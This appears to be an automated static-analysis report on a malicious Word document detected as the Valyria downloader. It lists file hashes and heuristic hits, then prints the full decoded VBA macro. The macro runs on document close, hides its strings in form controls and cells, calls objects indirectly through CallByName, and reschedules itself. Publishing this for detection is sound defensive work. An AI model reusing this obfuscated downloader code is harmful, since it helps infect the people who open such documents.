Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 c8d4f8a653023a25…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 83.1 KB
Created: 2021-01-29 09:59:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-02-09
MD5: 4ac16e16645f91f2f459ebe16254ecb6
SHA-1: 227ea258bd634ec15d26b2a490e8294964b1ea9d
SHA-256: c8d4f8a653023a2501791260d24f0f29feb21c071c94119dd468baa61509a617
Risk score: 222

Heuristics 5

  • ClamAV: Doc.Downloader.Valyria-10033915-0 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
  • VBA project inside OOXML (severity: medium, 2 related findings, rule: OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • CreateObject call (severity: high, rule: OLE_VBA_CREATEOBJ)
    Matched line in script:
    Set f0o = CreateObject(UserForm1.vq & UserForm1.fu)
  • CallByName call (severity: high, rule: OLE_VBA_CALLBYNAME)
    Matched line in script:
    Set ed = CallByName(f0o.Workbooks, UserForm1.hn & UserForm1.py, 1, UserForm2.ComboBox1, , , , UserForm1.jh)
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All of the following URLs were found in document text (OOXML body / shared strings):
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.microsoft.com/office/drawing/2016/ink
    • http://schemas.microsoft.com/office/drawing/2017/model3d
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2018/wordml/cex
    • http://schemas.microsoft.com/office/word/2016/wordml/cid
    • http://schemas.microsoft.com/office/word/2018/wordml
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 6971 bytes
SHA-256: df0faee35689b105082d92da9aef2e8c54152e6ec00accf86bdf2d7940b6ecb4

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Public bm, ci, e1, g3, d, f0o, at, qy, rb, s7, it, ei, j9, zs, gd, i

Sub Document_Close()

o6

End Sub

Sub o6()

On Error Resume Next

UserForm2.ComboBox1.ListIndex = 5

Set f0o = CreateObject(UserForm1.vq & UserForm1.fu)

lg = UserForm2.ComboBox10

f0o.DisplayAlerts = False

ts = 1301

f9 = 0

Err.Number = 0

While ts <> 0 And f9 < 32

Set ed = CallByName(f0o.Workbooks, UserForm1.hn & UserForm1.py, 1, UserForm2.ComboBox1, , , , UserForm1.jh)

ts = Err.Number

f9 = f9 + 16

Wend

If ts <> 0 Then

iwn = UserForm2.ComboBox25

ErrHandler:

k = CallByName(Application, UserForm1.ep & UserForm1.d3, 2)

If k <> False Then

Set a2 = CreateObject(UserForm1.i5 & UserForm1.nc)

k0 = UserForm2.ComboBox22

CallByName a2.Documents, UserForm1.hn & UserForm1.py, 1, ActiveDocument.FullName, , True

CallByName a2, UserForm1.ly & UserForm1.op, 1, Now + TimeSerial(0, 0, 2), UserForm1.rd & UserForm1.e2 & "o6"

Else

CallByName Application, UserForm1.ly & UserForm1.op, 1, Now + TimeSerial(0, 0, 17), UserForm1.rd & UserForm1.e2 & "o6"

End If

f0o.Quit

Exit Sub

End If

Dim os

n = UserForm2.ComboBox3

Set os = f0o.sheets(1)

xu = "'"

i = f0o.sheets(5).Cells(1, 1)

If Len(i) < 1 Then

If f0o.ActiveWorkbook.Title <> "Google" Then

GoTo ErrHandler

Else

Exit Sub

End If

End If

gg = f0o.sheets(1).Cells(29, 46).Value

k3 = UserForm2.ComboBox12

l3 = os.Cells(111, 27).Value

s7 = os.Cells(99, 21).Value

it = f0o.sheets(2).Cells(142, 2).Value

d = f0o.sheets(2).Cells(10, 29).Value

f0 = f0o.sheets(2).Cells(109, 9).Value

oz = f0o.sheets(1).Cells(101, 9).Value

d5 = f0o.sheets(3).Cells(111, 42).Value

n3 = f0o.sheets(2).Cells(20, 28).Value

ah = f0o.sheets(1).Cells(113, 41).Value

m4 = UserForm2.ComboBox21

j9 = f0o.sheets(2).Cells(110, 59).Value

at = os.Cells(109, 14).Value

rb = f0o.sheets(3).Cells(87, 42).Value

xul = f0o.sheets(3).Cells(38, 31).Value

c5 = f0o.sheets(2).Cells(5, 27).Value

ei = f0o.sheets(1).Cells(124, 10).Value

nv = UserForm2.ComboBox4

pb = f0o.sheets(1).Cells(98, 50).Value

fv3 = f0o.sheets(2).Cells(70, 1).Value

bm = f0o.sheets(3).Cells(27, 18).Value

im = f0o.sheets(3).Cells(93, 33).Value

bl = f0o.sheets(1).Cells(60, 26).Value

u5j = UserForm2.ComboBox27

qy = f0o.sheets(3).Cells(22, 10).Value

ci = f0o.sheets(3).Cells(124, 41).Value

j1x = UserForm2.ComboBox27

kd = f0o.sheets(3).Cells(87, 20).Value

p5 = f0o.sheets(2).Cells(63, 33).Value

gd = ""

Set Sh1 = f0o.sheets(4)

ag = 1

cb = True

While cb

hb7 = Sh1.Cells(ag, 1).Value

If Len(hb7) < 1 Then

cb = False

Else

gd = gd & hb7

End If

ag = ag + 1

Wend

fg = CallByName(f0o, ah, 2)

n6 = UserForm2.ComboBox8

UserForm1.qr.Value = oz & fg & fv3

UserForm1.la.Value = l3

CallByName CreateObject(p5), bl, 1, UserForm1.qr, pb, UserForm1.la

Set jcd = CreateObject(gg)

Set c9 = CallByName(jcd, f0, 2)

Set rc = CallByName(c9, kd, 1)

Set rb = CallByName(jcd, rb, 2)

pu = UserForm2.ComboBox14

Set g3 = jcd

crk = UserForm2.ComboBox27

eu = UserForm2.ComboBox16

UserForm5.ComboBox1 = "et"

Set bm = CallByName(zs, bm, 2)

qy = CallByName(bm, qy, 2)

UserForm1.gmg.Value = im & d5

UserForm3.ComboBox1 = n3

UserForm1.gmg.Value = xul

UserForm4.ComboBox1 = UserForm3.ComboBox1

UserForm3.ComboBox1 = qy

jcd = a4

gb = UserForm2.ComboBox27

ed = j

os = c7o

c9 = by

bno = UserForm2.ComboBox7

rc = f7

rb = v9

s7 = b51

it = be

zs = le

bm = jl

g3 = xgm

DoEvents

mp = UserForm2.ComboBox7

CallByName f0o, c5, 1

f0o = h1

hk = UserForm2.ComboBox16

End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{BD8F9E83-3336-4AFE-BFAA-929F15E52D17}{A01F3C2C-0DC4-4B39-939A-EED50EA8673C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{798FF0C9-54A6-460E-B7DE-612ADFD4F751}{9D469B2D-C81B-4B9A-858C-310C33BFDEE2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 
 

 dv = UserForm2.Controls.Count - 1
 
 
 

ID = UserForm2.ComboBox25

 

 hma = ""
 For h5 = 1 To dv Step 2
 hma = hma & UserForm2.Controls.Item(h5)
 Next

 ComboBox1.AddItem "f8"
 ComboBox1.AddItem "zg"
 ComboBox1.AddItem "ei"
 ComboBox1.AddItem "ed"
 ComboBox1.AddItem "i3"

ox = UserForm2.ComboBox8

 ComboBox1.AddItem hma
 ComboBox1.AddItem "gz"

rp = UserForm2.ComboBox9

 

jm = UserForm2.ComboBox5

 
 
 
 
 
 
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{8D89A438-1756-45FE-B39C-4309DBA34446}{98420ACD-B730-4ACB-A55E-AB73DFC5370E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()

dy = UserForm2.ComboBox11

 CallByName ActiveDocument.bm, ActiveDocument.at, VbMethod, 1, ActiveDocument.qy
 CallByName ActiveDocument.bm, ActiveDocument.ci, VbMethod, UserForm1.gmg.Value
End Sub

 

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{5275753D-C15B-4D0D-9FA0-1CAD5A6DA997}{5BCA7890-C56D-41BB-893F-8CA11C6F9B6A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.g3, ActiveDocument.d, VbMethod, UserForm1.gmg.Value, ActiveDocument.gd, ActiveDocument.i
End Sub

 

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{61EC9321-4325-44CC-A8D3-321B7041B8D9}{A247DC6D-29F1-4ED4-8C59-F21DB73B00CB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 Set ActiveDocument.s7 = CallByName(ActiveDocument.rb, ActiveDocument.s7, VbGet)
 Set ActiveDocument.it = CallByName(ActiveDocument.s7, ActiveDocument.it, VbGet)
 Set ActiveDocument.zs = CallByName(ActiveDocument.it, ActiveDocument.ei, VbMethod, ActiveDocument.j9)
End Sub

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 50688 bytes
SHA-256: e78fb54b2575cebb53336b5ea339eaf4a8d135bdb8a22b298281d673f25bfbc4
Detection
ClamAV: Doc.Downloader.Valyria-10033915-0
Obfuscation or payload: unlikely